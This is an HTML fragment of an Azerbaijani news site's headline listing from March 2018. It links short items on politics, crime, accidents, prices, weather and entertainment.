		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>MSK-nın sədr müavini: Prezident seçkilərində bütün seçicilərin iştirakını təmin etmək üçün zəruri tədbirlər görülür</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 252  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=politika"> 	<i class="glyphicon glyphicon-th-list"></i> Politika  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 13:29
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64039" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521797285_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bir ölkə sakininin orta hesabla aylıq xərci - STATİSTİKA</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 440  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 13:27
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64038" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521797074_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Evləri sökülən bəzi vətəndaşlar narazıdır, qiymətlər isə bahalaşır - FOTOLAR</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 768  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 13:24
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64037" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521797027_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Azərbaycanda "saxta" vəkilləri cəzalandıracaqlar</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 355  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 13:22
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64036" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521796941_1.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bu məhşur “Qədim Azərbaycan qadını” obrazını canlandırdı - FOTOLAR</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 327  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=shoubiznes"> 	<i class="glyphicon glyphicon-th-list"></i> Şou Biznes  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 13:22
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64035" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521796819_kr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>3 kişi qadına zor tətbiq edib</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 349  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=kriminal"> 	<i class="glyphicon glyphicon-th-list"></i> Kriminal  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 13:19
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64031" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521795524_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bakının bu hissələrində nəqliyyatın hərəkəti məhdudlaşdırılacaq</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 639  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:58
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64025" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521794526_pr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Qaxda 38 yaşlı kişini çaqqal dişləyib</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 311  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=proiswestviya"> 	<i class="glyphicon glyphicon-th-list"></i> Hadisə  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:40
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64024" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521794491_ec.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Qızıl 11 dollaradək bahalaşıb</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 246  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=ekonomika"> 	<i class="glyphicon glyphicon-th-list"></i> İqtisadiyyat  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:40
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64023" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521794452_pr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Qobustanda 2 uşaq dəm qazından zəhərlənib</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 255  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=proiswestviya"> 	<i class="glyphicon glyphicon-th-list"></i> Hadisə  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:39
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64022" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521794378_z.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>İnsan alverinə qarşı mübarizə üzrə illik hesabat MM-də müzakirəyə çıxarılacaq</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 270  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=vmire"> 	<i class="glyphicon glyphicon-th-list"></i> Dünya  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:39
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64021" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521794319_a.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>BMT-nin İnsan Hüquqları Şurasında “ASAN Xidmət” təcrübəsinin təşviqinə dair qətnamə qəbul edilib</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 275  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:38
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64020" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521794338_pr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Abşeron rayonunda yük avtomobili ilə sərnişin avtobusu toqquşub, xəsarət alanlar var</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 240  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=proiswestviya"> 	<i class="glyphicon glyphicon-th-list"></i> Hadisə  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:37
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64019" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521794281_kr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Abşeronda ər arvadını bıçaqlayaraq qətlə yetirib</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 273  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=kriminal"> 	<i class="glyphicon glyphicon-th-list"></i> Kriminal  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:36
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64018" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521794152_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bayram günlərində zəhərlənmə diaqnozu ilə xəstəxanaya müraciət edənlərin sayı açıqlanıb</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 277  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:35
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64017" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521793737_a.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Vaşinqtonda “Leyli və Məcnun” operasının premyerası keçirilib</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 455  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=vmire"> 	<i class="glyphicon glyphicon-th-list"></i> Dünya  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:28
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64013" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521792999_1.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>“Muhteşem Yüzyıl”ın aktyoru həbs olundu – FOTO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 4 749  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:15
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=64012" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521792881_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bakıda yol polisləri soyğunçunu yaxaladı</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 464  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=kriminal"> 	<i class="glyphicon glyphicon-th-list"></i> Kriminal  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 12:14
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63994" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521790063_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>“Zirə pomidoru” Avropa bazarında - VİDEO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 297  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 11:27
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63993" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521789894_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bakı gecələrində hamıya 24/7 əyləncə - VİDEO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 871  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 23-03 11:24
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63992" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521730829_kr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Killerlər azərbaycanlı biznesmenin “Range Rover”ini gülləboran etdilər</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 570  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=kriminal"> 	<i class="glyphicon glyphicon-th-list"></i> Kriminal  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 19:00
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63991" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521730623_ob.jpeg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bayramdan sonra bazarda qıtlıq yaşanır: Bəzi məhsullar 2 dəfə bahalaşdı -REPORTAJ, FOTOLAR</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 725  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 18:55
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63989" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521729877_po.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Ürəyi̇ Azərbaycanla döyünən avropadaki soydaşlarimi kölndəki̇ toplantiya dəvət edi̇rəm!</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 536  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=politika"> 	<i class="glyphicon glyphicon-th-list"></i> Politika  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 18:44
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63987" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521729416_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Ya pambıq ək, ya da torpağı təhvil ver - Ağdam və Ağcabədidə sahibkarlar təhdid edilir</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 602  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 18:35
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63986" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521728023_v.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Daha bir aktyor həbs edildi - Narkotik ticarəti</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 661  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=vmire"> 	<i class="glyphicon glyphicon-th-list"></i> Dünya  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 18:13
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63984" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521727290_o.jpeg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Sürücülərin nəzərinə - Bu yolda diqqətli olun!</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 1 104  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 18:01
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63983" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521726900_h.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Zaqatala sakini intihar edib.</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 520  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=proiswestviya"> 	<i class="glyphicon glyphicon-th-list"></i> Hadisə  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 17:54
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63982" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521724970_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bakıda valideynlər həyəcan təbili çalırlar: “Balalarımızı zəhərləyirlər” – FOTO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 28 434  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 17:22
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63981" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521723254_v.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Səhvən 31 il həbs edilən kişi milyonçu oldu</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 482  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=vmire"> 	<i class="glyphicon glyphicon-th-list"></i> Dünya  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 16:54
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63980" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521722447_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Pivə kişilərdə qadın hormonlarını artırır - FOTO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 1 636  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=etointeresno"> 	<i class="glyphicon glyphicon-th-list"></i> Maraqlı  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 16:40
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63979" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521722294_kr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Azərbaycan çempionu bıçaqlandı</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 572  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=kriminal"> 	<i class="glyphicon glyphicon-th-list"></i> Kriminal  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 16:37
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63978" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521720954_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bölgəmizdə qəribə bayram adəti: Axşamlar əllərində şam qəbiristanlıqda dolaşırlar</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 713  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 16:15
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63976" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521719230_pr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>12-yaşlı uşağın əlində fişəng partladı</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 475  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=proiswestviya"> 	<i class="glyphicon glyphicon-th-list"></i> Hadisə  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 15:47
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63975" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521719137_1.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Valideyinlərdən Ali Baş Komandana TƏŞƏKKÜRLƏR - Hərbi hissələrdə yaradılan şəraitə görə - FOTO + VİDEO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 584  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=war"> 	<i class="glyphicon glyphicon-th-list"></i> Ordu  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 15:45
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63974" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521718859_ob.jpeg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Azərbaycanda "bayram terroru": 7 ölü, 18 yaralı</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 721  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 15:39
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63971" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521717391_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Sabaha olan hava proqnozu açıqlanıb</b></p></font></center>
